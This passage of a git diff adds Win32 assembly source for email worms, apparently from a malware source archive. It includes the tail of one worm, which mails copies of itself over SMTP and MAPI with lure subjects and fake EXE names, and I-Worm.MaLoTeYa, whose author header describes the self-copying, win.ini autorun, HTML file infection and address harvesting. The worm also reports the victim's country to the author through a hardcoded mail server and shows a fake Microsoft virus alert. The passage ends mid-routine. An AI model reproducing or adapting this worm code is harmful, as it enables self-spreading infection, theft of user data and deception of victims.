api VirtualAlloc + mov dword ptr[MemMessageBody1], eax + ret + +;.............. 
Map The Email File + +;OUT: eax = mapaddress +; cf = 0 if no error + +MapEmailFile: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + api GetSystemDirectoryA + @pushsz '\ICMAIL.DLL' + push offset TempPath&Name + api lstrcat ; Path+Name + + call Open&MapFile + ret + + +;.......................... Send Via MAPI .................................... +;............................................................................. + + +MapiSend: + push ebx ; For The send Loop + + xor eax, eax + push eax + push eax + push offset MapiMessage + push eax + push dword ptr [MAPISession] + api MAPISendMail + + pop ebx ; For The send Loop + ret + + +;........................... Send via SMTP ................................... +;............................................................................. + +; 4 Part: +; - GetLocalSmtpServeur: Find default SMTP server +; - SmtpConnection: Init Socket + Connect to Smpt host +; - SmtpSendCommand: Send all the commands +; - SmtpDisConnection: Clean + Disconnect + + +;.............. Get User Server + +GetUserSmtpServer: + +GetUserInternetAccount: + mov dword ptr[KeySize], 00000040h ; Init Size to get + + push offset KeySize + push offset AccountSubKey + push offset Reg + @pushsz "Default Mail Account" + @pushsz "Software\Microsoft\Internet Account Manager" + push 80000001h + api SHGetValueA + test eax, eax + jne GetUserSmtpServerError + +GetUserInternetServer: + mov dword ptr[KeySize], 00000040h ; Init Size to get + + push offset KeySize + push offset SmtpServeur + push offset Reg + @pushsz "SMTP Server" + lea eax, AccountKey + push eax + push 80000001h + api SHGetValueA + test eax, eax + jne GetUserSmtpServerError + clc + ret +GetUserSmtpServerError: + stc + ret + +;.............. Smtp Connection + +SmtpConnection: + pushad + push offset WSAData ; Struct WSA + push 101h ; VERSION1_1 + api WSAStartup ; Socket Init + test eax,eax ; ok ? 
+ jne WSA_Error ; No, exit with stc + + push 0 ; Protocol = 0 (more sure) + push 1 ; SOCK_STREAM + push 2 ; AF_INET (most used) + api socket ; create socket + inc eax ; -1 = error + je Socket_Error ; WSACleanUp and stc + dec eax + mov [hSocket],eax ; Socket Handle + + push 25 ; Smtp port + api htons ; Convert it + mov word ptr[wsocket+2], ax ; The port ( 2 ptr[wsocket]=AF_INET ) + + push offset SmtpServeur ; The SMPT Host + api gethostbyname ; SMPT to IP + test eax,eax ; error ? + je Error_CloseSocket&CleanUp ; Exit + stc + mov eax,[eax+10h] ; get ptr 2 IP into HOSTENT + mov eax,[eax] ; get ptr 2 IP + mov [ServeurIP],eax ; Save it + + push 010h ; size of sockaddr struct + push offset wsocket ; Ptr on it + push [hSocket] ; Handle + api connect ; connect to smtp server + inc eax + je Error_CloseSocket&CleanUp ; Exit + stc + call GetServeurReply ; get server response + jc Error_CloseSocket&CleanUp ; If c=0 Connection OK ! + popad + clc + ret + +GetServeurReply: + push 0 ; Flags + push 4 ; Get a LongWord + push offset ServeurReply ; in ServeurReply + push [hSocket] + api recv ; get stmp server error code + cmp eax, 4 ; Receive a LongWord + jne ReplyError ; No, stc + +ServeurReplyLoop: + mov ebx, offset ServeurReplyEnd ; Get a byte In + push 0 ; Flags + push 1 ; a byte + push ebx + push [hSocket] + api recv + jne ReplyError + + cmp byte ptr [ebx], 0Ah + jne ServeurReplyLoop ; skip over CRLF + + mov eax, [ServeurReply] + cmp eax, ' 022' + je ReplyOk + cmp eax, ' 052' + je ReplyOk + cmp eax, ' 152' + je ReplyOk + cmp eax, ' 453' + jne ReplyError +ReplyOk: + clc + ret +ReplyError: + stc + ret + +;.............. Smtp DisConnection + +SmtpDisConnection: + pushad +Error_CloseSocket&CleanUp: + push dword ptr [hSocket] + api closesocket +Socket_Error: + api WSACleanup +WSA_Error: + popad + stc + ret + +;.............. 
Smtp Send + +SmtpSendCommand: + pushad + +SendHelloCmd: + mov esi,offset cmd_helo ; 'HELO xxx',CRLF + push 14 ; cmd size + pop ecx ; cmd size + call SendSocket ; send HELO command + call GetServeurReply ; Ok ? + jc Error_CloseSocket&CleanUp ; No + +SendMailFromCmd: + mov esi,offset cmd_mailfrom ; 'MAIL FROM:<' + push 11 ; cmd size + pop ecx ; size + call SendSocket ; send MAIL FROM command + + mov esi,offset mailfrom ; ptr default user email + push esi + api lstrlen + xchg ecx, eax + call SendSocket ; 2 Write xxxx@xxxx.xx + + call Brk1 + db '>',CRLF +Brk1: pop esi + push 3 + pop ecx + call SendSocket ; 3 Write '>',CRLF + + call GetServeurReply ; Ok + jc Error_CloseSocket&CleanUp ; No + +SendRcptToCmd: + mov esi,offset cmd_rcptto ; 'RCPT TO:<' + push 9 ; cmd size + pop ecx ; cmd size + call SendSocket ; 1 Write 'RCPT TO:<' + + mov esi,offset CurrentEmail ; ptr email + push esi + api lstrlen + xchg ecx, eax + call SendSocket ; 2 Write xxxx@xxxx.xx + + call Brk2 + db '>',CRLF +Brk2: pop esi + push 3 + pop ecx + call SendSocket ; 3 Write '>',CRLF + + call GetServeurReply ; Ok + jc Error_CloseSocket&CleanUp ; No + +SendDataCmd: + mov esi,offset cmd_data ; 'DATA',CRLF + push 6 ; Size + pop ecx ; Size + call SendSocket ; send DATA command + call GetServeurReply ; Ok + jc Error_CloseSocket&CleanUp ; No + +SendeMailBody: + mov esi, dword ptr[MemMessageBody1] ; Start Message Body + mov ecx, dword ptr[MessageSize1] + call SendSocket + + mov esi,dword ptr [MemEncoded] ; Encoded File + mov ecx,dword ptr [EncodedFileSize] + call SendSocket + + mov esi, offset MessageBody2 ; End Message Body + mov ecx, MessageSize2 + call SendSocket + +SendTermCmd: + mov esi,offset cmd_term ; CRLF,'.',CRLF + push 5 ; size + pop ecx ; size + call SendSocket ; send message header+body + call GetServeurReply ; Ok ? 
+ jc Error_CloseSocket&CleanUp ; No + +SendQuitCmd: + mov esi,offset cmd_quit ; 'QUIT',CRLF + push 6 ; size + pop ecx ; size + call SendSocket ; send QUIT command + popad + clc + ret + +SendSocket: + push 0 ; Flags + push ecx ; size + push esi ; Source + push [hSocket] ; Handle + api send + ret + + +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: +;........................ Minor Sub Routine .................................. +;............................ Z O N E ........................................ +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: + + +;........................ Open & Map a File .................................. +;............................................................................. + + +; IN: TempPath&Name = Path + Name of file to Open +; OUT: fhandle, maphandle, mapaddress +; cf = 0 ou 1 + +Open&MapFile: + xor eax,eax + push eax + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push eax + push FILE_SHARE_READ + push GENERIC_READ or GENERIC_WRITE + push Offset TempPath&Name + api CreateFileA + inc eax + je Open&MapFileError + dec eax + mov dword ptr [fhandle], eax + + xor eax,eax + push eax + push eax + push eax + push PAGE_READWRITE + push eax + push dword ptr [fhandle] + api CreateFileMappingA + or eax,eax + jz Open&MapFileCloseFileHandle + mov dword ptr [maphandle],eax + + xor ebx,ebx + push ebx + push ebx + push ebx + push FILE_MAP_WRITE + push eax + api MapViewOfFile + or eax,eax + jz Open&MapFileCloseMapHandle + mov dword ptr [mapaddress], eax + clc + ret + +Open&MapFileUnmapView: + push dword ptr [mapaddress] + api UnmapViewOfFile + +Open&MapFileCloseMapHandle: + push dword ptr [maphandle] + api CloseHandle + +Open&MapFileCloseFileHandle: + push dword ptr [fhandle] + api CloseHandle +Open&MapFileError: + stc + ret + +;...................... Search Personal Documents ............................ 
+;............................................................................. + +; OUT - Personal Doc Path in Mem in $ [PersoDocListe] + +PersonalDocSearch: + xor eax,eax + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push PersoFileSize + push eax ; System decide where + api VirtualAlloc + test eax, eax + je PersonalDocSearchError + mov dword ptr[PersoDocListe], eax + + call Clear_TempPath&Name + + push 00h + push 05h ; Personal Path + push offset TempPath&Name + push 00h + api SHGetSpecialFolderPathA + + push offset TempPath&Name + api SetCurrentDirectoryA ; Selected dir = Personal Path + + lea eax, FindPersonalFile + mov dword ptr[RoutineToCall], eax + call AllSubDirSearch ; Action = FindPersonalFile +PersonalDocSearchError: + ret + +;.............. Search Personal File + +FindPersonalFile: + cmp dword ptr[NbPersonalFound], NbPersoWanted ; Enought Perso File + je NoMorePersonalFile + + push offset search + @pushsz "*.doc" + api FindFirstFileA + + mov dword ptr [PersonalSearchHandle], eax + inc eax + jz NoMorePersonalFile + +PersonalDocumentFound: + mov edi, dword ptr[PersoDocListe] + mov edx, dword ptr[NbPersonalFound] + rol edx, 8 + add edi, edx ; Right Pos + + push edi + push 260 + api GetCurrentDirectoryA ; The dir + + @pushsz '\' + push edi + api lstrcat ; The \ + + push offset [search.FileName] + push edi + api lstrcat ; The Name + + inc dword ptr[NbPersonalFound] ; Next One + cmp dword ptr[NbPersonalFound], NbPersoWanted ; Enought Perso File + je EnoughtPerso + +FindPersonalFileNext: + push offset search + push dword ptr [PersonalSearchHandle] + api FindNextFileA + + test eax, eax + jnz PersonalDocumentFound + +EnoughtPerso: + push dword ptr [PersonalSearchHandle] + api FindClose + +NoMorePersonalFile: + ret + +;.............. Search in all Sub Dir + Action in ............................ 
+ +; IN: - Root dir Selected for the Search begin +; - RoutineToCall = SeekHtmlCurrentDir +; OUT: - What perform RoutineToCall in all subdir of selected Root + + +AllSubDirSearch: + xor ebx,ebx + +FindFirstDir: + lea edi, search + push edi + @pushsz "*.*" + api FindFirstFileA + + mov dword ptr [RecSearchHandle],eax + + inc eax + jz FirstDirNotFound + +DirTravel: + bt word ptr[search.FileAttributes],4 + jnc FindNextDir + + lea eax,[search.FileName] + + cmp byte ptr [eax],"." + jz FindNextDir + + push eax + api SetCurrentDirectoryA + +InNewDir_Action: + pushad + call dword ptr[RoutineToCall] ; THE Action + popad + + push dword ptr [RecSearchHandle] + inc ebx + jmp FindFirstDir +FindNextDir: + push edi + push dword ptr [RecSearchHandle] + api FindNextFileA + + or eax,eax + jnz DirTravel + +FirstDirNotFound: + @pushsz ".." + api SetCurrentDirectoryA + + or ebx,ebx + jz AllSubDirSearchEnd + + dec ebx + pop dword ptr [RecSearchHandle] + jmp FindNextDir + +NextDirNotFound: + push dword ptr [RecSearchHandle] + api FindClose + jmp FirstDirNotFound + +AllSubDirSearchEnd: + ret + +;.......................... Random Number .................................... + +; IN: Edi +; OUT: Random Number in EDX: 0 <-> Edi-1 + +GetRndNumber: + push eax ebx ecx esi esp ebp + + mov eax, dword ptr[RandomNb] + mov ecx,41C64E6Dh + mul ecx + add eax,00003039h + mov dword ptr[RandomNb], eax + + xor edx, edx + div edi ; Reste < Edi in EDX + + pop ebp esp esi ecx ebx eax + ret + +;......................... Free The Mem ...................................... + +FreeTheMem: + mov ecx, dword ptr[EmailList] + jecxz FreeTheMemNext1 + call MemFreeIt + +FreeTheMemNext1: + mov ecx, dword ptr[MemMessageBody1] + jecxz FreeTheMemNext2 + call MemFreeIt + +FreeTheMemNext2: + mov ecx, dword ptr[PersoDocListe] + jecxz FreeTheMemFin + call MemFreeIt + +FreeTheMemFin: + ret + +MemFreeIt: + push 00008000h ; MEM_RELEASE + push 0 + push ecx + api VirtualFree + ret + +;..................... 
Clear TempPath & Name ................................. + +Clear_TempPath&Name: + xor al,al + mov ecx,260 + lea edi,TempPath&Name ; Clear the path + rep stosb + ret + +;..................... Encode File Base 64 ................................... + +; IN: Path of the file in offset MyPath +; OUT: Encoded file in Mem + +CodeB64File: + +OpenFileToEncode: + xor eax,eax + push eax + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push eax + push FILE_SHARE_READ + push GENERIC_READ + push Offset MyPath ; The file to encode + api CreateFileA + inc eax + je CodeB64FileEnd + dec eax + mov dword ptr [TempFileHandle], eax + +GetFileToEncodeSize: + push 0 + push eax + api GetFileSize + inc eax + je CodeB64FileEnd + dec eax + mov dword ptr [OurSizeToEncode], eax + + add eax, 1000 ; Security + +GetMemToReadFileToEncode: + xor ebx,ebx + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push eax + push ebx ; System decide where + api VirtualAlloc + test eax, eax + je CodeB64FileEnd + mov dword ptr[MemToEncode], eax + +ReadFileToEncode: + push 00h + push offset ByteReaded + push dword ptr [OurSizeToEncode] + push eax + push dword ptr [TempFileHandle] + api ReadFile + + push dword ptr [TempFileHandle] + api CloseHandle + +GetMemToEncodeFile: + mov eax, dword ptr [OurSizeToEncode] + rol eax, 4 ; We need ori size *3 (+security) + xor ebx,ebx + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push eax + push ebx ; System decide where + api VirtualAlloc + test eax, eax + je CodeB64FileEnd + mov dword ptr[MemEncoded], eax + +AlignFileToEncodeSize: + mov eax, dword ptr [OurSizeToEncode] + push 3 + pop ecx + xor edx,edx + push eax + div ecx + pop eax + sub ecx,edx + add eax,ecx ; align size to 3 + +EncodeFileNow: + xchg eax,ecx + mov edx,dword ptr [MemEncoded] + mov eax,dword ptr [MemToEncode] + call encodeBase64 + + mov dword ptr [EncodedFileSize],ecx + +CodeB64FileEnd: + ret + + +;................... 
Encode Base 64 Algorithme ............................... + +encodeBase64: ; By Bumblebee +; input: +; EAX = Address of data to encode +; EDX = Address to put encoded data +; ECX = Size of data to encode +; output: +; ECX = size of encoded data +; + xor esi,esi + call over_enc_table + db "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + db "abcdefghijklmnopqrstuvwxyz" + db "0123456789+/" +over_enc_table: + pop edi + push ebp + xor ebp,ebp +baseLoop: + movzx ebx,byte ptr [eax] + shr bl,2 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + mov bx,word ptr [eax] + xchg bl,bh + shr bx,4 + mov bh,0 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + mov bx,word ptr [eax] + xchg bl,bh + shr bx,6 + xor bh,bh + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + xor ebx,ebx + movzx ebx,byte ptr [eax] + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + inc eax + + inc ebp + cmp ebp,24 + jna DontAddEndOfLine + + xor ebp,ebp + mov word ptr [edx+esi],0A0Dh + inc esi + inc esi + test al,00h + org $-1 +DontAddEndOfLine: + inc ebp + sub ecx,3 + or ecx,ecx + jne baseLoop + + mov ecx,esi + add edx,esi + pop ebp + ret + +;----------------------------------------------------------------------------- +;------------------------------ Data Zone ------------------------------------ +;----------------------------------------------------------------------------- + +.data + + +;-------------------------- Variables Zone ----------------------------------- + +SmtpFlag db 0 ; Select Mapi or Smtp +PayloadFlag db 0 ; Payload = 1 +UserEmailFoundFlag db 0 ; found = 1 + +;...................... Encode B64 Variables + +EncodedFileSize dd 0 +MemEncoded dd 0 +MemToEncode dd 0 +OurSizeToEncode dd 0 +ByteReaded dd 0 + +;...................... 
Email SMTP Variables + +Reg dd 1 ; String +KeySize dd 0 ; Size to read with SHGetValue + ; (init it + return effectiv lenght read in) + +AccountKey db 'Software\Microsoft\Internet Account Manager\Accounts\' +AccountSubKey db 64 dup (0) + +SmtpServeur db 64 dup (0) ; smtp server found with regkey + + +wsocket dw 2 ; sin_family ever AF_INET + dw ? ; the port +ServeurIP dd ? ; addr of server node + db 8 dup (?) ; not used + + +hSocket dd 0 ; Socket Handle + +ServeurReply dd ? ; error code +ServeurReplyEnd db ? ; byte for LF + + +CRLF equ <13,10> + +cmd_helo db 'HELO Support',CRLF +cmd_mailfrom db 'MAIL FROM:<' +cmd_rcptto db 'RCPT TO:<' + +cmd_data db 'DATA',CRLF +cmd_term db CRLF,'.',CRLF +cmd_quit db 'QUIT',CRLF + + +MemMessageBody1 dd 0 ; Ptr on Mem where built header +MessageSize1 dd 0 ; Size Header + bordel Mime + +MessageBody1: db 'Mime-Version: 1.0',CRLF + db 'Content-Type: multipart/mixed; boundary="--123"',CRLF,CRLF + + db '----123',CRLF + db 'Content-Type: text/plain; charset=us-ascii',CRLF + db 'Content-Transfer-Encoding: 7bit',CRLF,CRLF,0 + + ; Text part + +MessageBody1b: db '----123',CRLF + db 'Content-Type: application/octet-stream; name=',0 ; filename part +MessageBody1c: db 'Content-Transfer-Encoding: base64',CRLF + db 'Content-Disposition: attachment; filename=',0 ; filename part + + ; Encoded part + +MessageBody2: db 10,'--123--',CRLF +MessageSize2 equ $-MessageBody2 + + +RndFileName1 db '"SETUP.EXE"',0 +RndFileName2 db '"HGAME.EXE"',0 +RndFileName3 db '"MININET.EXE"',0 +RndFileName4 db '"NETAV.EXE"',0 +RndFileNameTb dd offset RndFileName1, offset RndFileName4, offset RndFileName3 + dd offset RndFileName4, offset RndFileName2 +NbRndFileName equ ($-offset RndFileNameTb)/4 + +RndText1: db 'Hi ',CRLF + db 'Here is what you asked, bye. ',CRLF,0 +RndText2: db 'Hello ',CRLF + db 'Maybe you could help me with this, bye. ',CRLF,0 +RndText3: db 'Hello ',CRLF + db 'Now you can try it, bye. 
',CRLF,0 + +RndTextTb dd offset RndText1, offset RndText2, offset RndText3 +NbRndText equ ($-offset RndTextTb)/4 + +RndSubject1 db 'Hello',0 +RndSubject2 db 'For you',0 +RndSubject3 db 'Try it',0 +RndSubject4 db 'Re:',0 +RndSubjectTb: dd offset RndSubject2, offset RndSubject1, offset RndSubject4 + dd offset RndSubject3, offset RndSubject4 +NbSubject equ ($-offset RndSubjectTb)/4 + +RndFromName1 db 'morgan',0 +RndFromName2 db 'mick',0 +RndFromName3 db 'carla',0 +RndFromName4 db 'eva',0 +RndFromNameTb: dd offset RndFromName1, offset RndFromName2, offset RndFromName3 + dd offset RndFromName4 +NbFromName equ ($-offset RndFromNameTb)/4 + +RndFromServ1 db '@caramail.com',0 +RndFromServ2 db '@hotmail.com',0 +RndFromServ3 db '@aol.com',0 +RndFromServTb: dd offset RndFromServ1, offset RndFromServ2, offset RndFromServ3 +NbFromServ equ ($-offset RndFromServTb)/4 + + +;...................... Email MAPI Variables + +IConnectedStateTemp dd 0 ; For InternetConnectedState + +MapiMessage equ $ + dd ? + dd offset subject + dd offset textmail + dd ? + dd offset date + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset MapiFileDesc + +MsgFrom equ $ + dd ? + dd ? + dd offset namefrom + dd offset mailfrom + dd ? + dd ? + +MsgTo equ $ + dd ? + dd 1 + dd offset nameto + dd offset CurrentEmail + dd ? + dd ? + +MapiFileDesc equ $ + dd ? + dd ? + dd ? + dd offset MyPath ; File to attache + dd ? + dd ? + +CurrentEmail db EmailSize dup (0) +MAPISession dd 0 + +subject db 'Hello',0 + +date db '',0 + +namefrom db '',0 + +mailfrom db EmailSize dup (0) + +nameto db '',0 + +textmail db 'Hi ',CRLF + db 'Here is what you asked, bye... ',0 + + +;...................... Residency + Dump Variables + +MutexHdl dd 0 +MyPath db 260 dup (0) +TempFileHandle dd 0 +ByteWritten dd 0 + +;...................... 
Email Search Variables + +NbEmailFound dd 0 ; Compte combien d'email found +EmailList dd 0 ; Ptr zone Mem ou stocker Emails + +TempPath&Name db 260 dup (0) + +fhandle dd 0 ; To find & map file +mapaddress dd 0 +maphandle dd 0 + +maphandlemail dd 0 ; for html found +esi_save dd 0 +EmailCurrentPos dd 0 + +RandomNb dd 0 ; Init with GettickCount + +NbWabEmail dd 0 ; Nb emails in *.Wab + +;...................... Recursive Search Variables + +RecSearchHandle dd 0 ; For the Recursive search +RoutineToCall dd 0 ; Ptr on routine to execute in all SubDir + +PersonalSearchHandle dd 0 ; For personal doc search +NbPersonalFound dd 0 ; Nb Personal doc found +PersoDocListe dd 0 ; Ptr zone Mem ou stocker Path Doc Perso + +;--------------------------- Structures Zone --------------------------------- + +;...................... Search File Structure + +filetim struct +FT_dwLowDateT dd ? +FT_dwHighDateT dd ? +filetim ends + +w32fd struct +FileAttributes dd ? +CreationTime filetim ? +LastAccessTime filetim ? +LastWriteTime filetim ? +FileSizeHigh dd ? +FileSizeLow dd ? +Reserved0 dd ? +Reserved1 dd ? +FileName db 260 dup (0) +AlternateFileN db 13 dup (?) + db 3 dup (?) +w32fd ends + +search w32fd ? + +;...................... System Time Structure + +SystemTimeData equ $ +STDYear dw ? +STDMonth dw ? +STDDayOfWeek dw ? +STDDay dw ? +STDHour dw ? +STDMinute dw ? +STDSecond dw ? +STDMilliseconds dw ? + +;...................... Sockets Structure + +WSAData equ $ + dw ? + dw ? + db 257 dup (?) + db 129 dup (?) + dw ? + dw ? + dd ? + + +end Mv + diff --git a/Win32/I-Worm.MaLoTeYa.asm b/Win32/I-Worm.MaLoTeYa.asm new file mode 100644 index 00000000..c67978ef --- /dev/null +++ b/Win32/I-Worm.MaLoTeYa.asm 
@@ -0,0 +1,754 @@ +comment # +Name : I-Worm.MaLoTeYa +Author : PetiK +Date : July 2nd - July 6th +Size : 12288 byte + +Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the +run= line and creates the VARegistered.htm file in the StartUp folder. This file send some +informations to petik@multimania.com and displays a fake message. +If the version of the platform is Windows 95/98, the file is a service process. +It infects all *.htm and *.html file while writing at the end a VB script. It checks after +if exist a internet connection and scans all *.htm* files in the "Temporary Internet Files" +to find some EMail addreses and send a copy of itself. The worms sends equally an email to +"petik@multimania.com" with the country of the user. When the user want to see the +system properties, the title of the window is changed by "PetiK always is with you :-)". + +Greets to Benny, ZeMacroKiller98, Mandragore. + +tasm32 /M /ML Maloteya +tlink32 -Tpe -aa -x Maloteya,,,import32 + +# + +.586p +.model flat +.code + +JUMPS + +callx macro a +extrn a:proc +call a +endm + +include useful.inc + +;---------------------------------------- +;Installation of the worm in the computer +;---------------------------------------- +DEBUT: +VERIF: push 00h + callx GetModuleFileNameA + push 50h + push offset szOrig + push eax + callx GetModuleFileNameA + + push 50h + push offset szCopie + callx GetWindowsDirectoryA + @pushsz "\RUNW32.EXE" + push offset szCopie + callx lstrcat + + push 50h + push offset szCopb + callx GetSystemDirectoryA + @pushsz "\MSVA.EXE" + push offset szCopb + callx lstrcat + + push offset szOrig + push offset szCopie + callx lstrcmp + test eax,eax + jz CACHE + +COPIE: push 00h + push offset szCopie + push offset szOrig + callx CopyFileA + push 00h + push offset szCopb + push offset szOrig + callx CopyFileA + +WININI: push 50 + push offset szWinini + callx GetWindowsDirectoryA + @pushsz "\\WIN.INI" + push offset szWinini + callx 
lstrcat + push offset szWinini + push offset szCopie + @pushsz "run" + @pushsz "windows" + callx WritePrivateProfileStringA + +;-------------------------------------------------- +;Create VARegistered.htm file in the StartUp folder +;-------------------------------------------------- +C_GET: @pushsz "SHELL32.dll" + callx LoadLibraryA + mov SHELLhdl,eax + @pushsz "SHGetSpecialFolderPathA" + push SHELLhdl + callx GetProcAddress + mov getfolder,eax + push 00h + push 07h ; STARTUP Folder + push offset StartUp + push 00h + call [getfolder] + test eax,eax + je F_HTM + @pushsz "\VARegistered.htm" + push offset StartUp + callx lstrcat + +HTM: push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + push offset StartUp + callx CreateFileA + mov [FileHdl],eax + push 00h + push offset octets + push HTMTAILLE + push offset htmd + push [FileHdl] + callx WriteFile + push [FileHdl] + callx CloseHandle +F_HTM: push [SHELLhdl] + callx FreeLibrary + +F_MESS: push 1000 + callx Sleep + push 1040h + @pushsz "Microsoft Virus Alert" + @pushsz "Your system does not appear infected with I-Worm.Magistr" + push 00h + callx MessageBoxA + jmp FIN + +;---------------------------------- +;Serivice process for Windows 95/98 +;---------------------------------- +CACHE: @pushsz "KERNEL32.dll" + callx GetModuleHandleA + @pushsz "RegisterServiceProcess" + push eax + callx GetProcAddress + xchg ecx,eax + jecxz D_INF + push 01h + push 00h + call ecx + +D_INF: push 50 + push offset szCurrent + callx GetCurrentDirectoryA + push offset szCurrent + callx SetCurrentDirectoryA + +;--------------------------------------------- +;Infect all *.htm* files of the Windows folder +;--------------------------------------------- +FFF: push offset Search + @pushsz "*.htm*" ; Search some *.htm* files... 
+ callx FindFirstFileA + inc eax + je F_INF + dec eax + mov [htmlHdl],eax + +i_file: call infect ; and infect them + + push offset Search + push [htmlHdl] + callx FindNextFileA + test eax,eax + jne i_file + push [htmlHdl] + callx FindClose +F_INF: + +;----------------------- +; Check if we r conected +;----------------------- +NET1: @pushsz "WININET.dll" + callx LoadLibraryA + test eax,eax + jz FIN + mov WNEThdl,eax + @pushsz "InternetGetConnectedState" + push WNEThdl + callx GetProcAddress + test eax,eax + jz FIN + mov netcheck,eax + jmp NET2 +NET2: push 00h + push offset Temp + call [netcheck] ; Connect to Internet ?? + dec eax + jnz NET2 +FINNET: push [WNEThdl] + callx FreeLibrary + +PAYS: push 50 + push offset szSystemini + callx GetWindowsDirectoryA + @pushsz "\Win.ini" + push offset szSystemini + callx lstrcat + push offset szSystemini + push 20 + push offset org_pays + push offset Default + @pushsz "sCountry" + @pushsz "intl" + callx GetPrivateProfileStringA + +;------------------------------------------------------------------ +; Send the name of country to "petik@multomania.com" (perhaps bugs) +;------------------------------------------------------------------ +SMTP: push offset WSA_Data ; Winsock + push 0101h ; ver 1.1 (W95+) + callx WSAStartup + or eax,eax + jnz INIT + + @pushsz "obelisk.mpt.com.uk" + callx gethostbyname ; convert SMTP Name to an IP address + xchg ecx,eax + jecxz FREE_WIN ; Error ? 
+ mov esi,[ecx+12] ; Fetch IP address + lodsd + push eax + pop [ServIP] + + push 00h ; Create Socket + push 01h ; SOCK_STREAM + push 02h ; AF_INET + callx socket + mov work_socket,eax + inc eax + jz FREE_WIN + + push 16 ; Sze of connect strucure + call @1 ; Connect structure + dw 2 ; Family + db 0, 25 ; Port number + ServIP dd 0 ; IP of server + db 8 dup(0) ; Unused + @1: + push [work_socket] + callx connect + inc eax + jz CLOSE_SOC + + lea esi,Send_M + mov bl,6 + + Command_Loop: xor eax,eax + + call @2 ; Time-out: + Time_Out: dd 5 ; Seconds + dd 0 ; Milliseconds + @2: + push eax ; Not used (Error) + push eax ; Not used (Writeability) + call @3 + Socket_Set: dd 1 ; Socket count + work_socket dd 0 ; Socket + @3: + push eax ; Unused + callx select + dec eax + jnz CLOSE_SOC + + push 00h + push 512 ; Received data from socket + push offset buf_recv + push [work_socket] + callx recv + xchg ecx,eax ; Connection closed ? + jecxz CLOSE_SOC + inc ecx ; Error ? + jz CLOSE_SOC + or ebx,ebx ; Received stuff was QUIT + jz CLOSE_SOC ; reply ? then close up. + mov al,'2' ; "OK" reply + + cmp bl,2 ; Received stuff was the DATA + jne Check_Reply ; reply ? + inc eax + Check_Reply: scasb + je Wait_Ready + + lea esi,Send_M + (5*4) + mov bl,1 + + Wait_Ready: + xor ecx,ecx + lea eax,Time_Out + push eax + push ecx ; not used (Error) + lea eax,Socket_Set + push eax ; Writeability + push ecx ; Not used (Readability) + push ecx ; Unused + callx select + dec eax ; Time-ouit ?? 
+ jnz CLOSE_SOC + + cld + lodsd + + movzx ecx,ax + shr eax,16 + add eax,ebp + + push ecx ; Send command and data to the socket + push 00h + push ecx ; Size of buffer + push eax ; Buffer + push [work_socket] + callx send + pop ecx + cmp eax,ecx + jne CLOSE_SOC + dec ebx + jns Command_Loop + +CLOSE_SOC: + push [work_socket] + callx closesocket +FREE_WIN: + callx WSACleanup + + +INIT: @pushsz "MAPI32.dll" + callx LoadLibraryA + test eax,eax + jz FIN + mov MAPIhdl,eax + @pushsz "MAPISendMail" + push MAPIhdl + callx GetProcAddress + test eax,eax + jz FIN + mov sendmail,eax + +D_GET: @pushsz "SHELL32.dll" + callx LoadLibraryA + mov SHELLhdl,eax + @pushsz "SHGetSpecialFolderPathA" + push SHELLhdl + callx GetProcAddress + mov getfolder,eax + push 00h + push 20h ; MSIE Cache Folder + push offset Cache + push 00h + call [getfolder] + push [SHELLhdl] + callx FreeLibrary + push offset Cache + callx SetCurrentDirectoryA + +;----------------------------------------------------------- +; Search email addresses into the "Temporary Internet Files" +;----------------------------------------------------------- +FFF2: push offset Search + @pushsz "*.htm*" + callx FindFirstFileA + inc eax + je END_SPREAD + dec eax + mov [htmlHdl],eax + +i_htm: call infect2 + + push offset Search + push [htmlHdl] + callx FindNextFileA + test eax,eax + jne i_file + push [htmlHdl] + callx FindClose + +END_SPREAD: + push [MAPIhdl] + callx FreeLibrary + +;--------------------------------------------------------------- +; Changes the title of the System Properties window on Wednesday +;--------------------------------------------------------------- +DATE: push offset SystemTime + callx GetSystemTime + cmp [SystemTime.wDayOfWeek],3 + jne FIN +WIN1: @pushsz "Proprits Systme" + push 00h + callx FindWindowA + test eax,eax + jz WIN2 + jmp WIN3 +WIN2: @pushsz "System Properties" ; Change title some windows + push 00h + callx FindWindowA + test eax,eax + jz WIN1 +WIN3: mov edi,eax + @pushsz "PetiK always is with 
you :-)" + push edi + callx SetWindowTextA + jmp WIN1 + +FIN: push 00h + callx ExitProcess + +infect: pushad + mov esi,offset Search.cFileName + push esi + callx GetFileAttributesA + cmp eax,1 + je end_infect + push 00h + push 80h + push 03h + push 00h + push 01h + push 40000000h + push esi + callx CreateFileA + xchg eax,edi + inc edi + je end_infect + dec edi + push 02h ; FILE_END + push 00h + push [Dist] + push edi + callx SetFilePointer + push 00h + push offset octets + push HTMSIZE + push offset d_htm + push edi + callx WriteFile + push edi + callx CloseHandle + push 01h ; READONLY + push esi + callx SetFileAttributesA +end_infect: popad + ret + +infect2:pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + push offset Search.cFileName + inc eax + je END_SPREAD + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 02h ; PAGE_READONLY + push eax + push ebx + callx CreateFileMappingA + test eax,eax + je F1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 04h ; FILE_MAP_READ + push ebp + callx MapViewOfFile + test eax,eax + je F2 + xchg eax,esi + + push 00h + push ebx + callx GetFileSize + 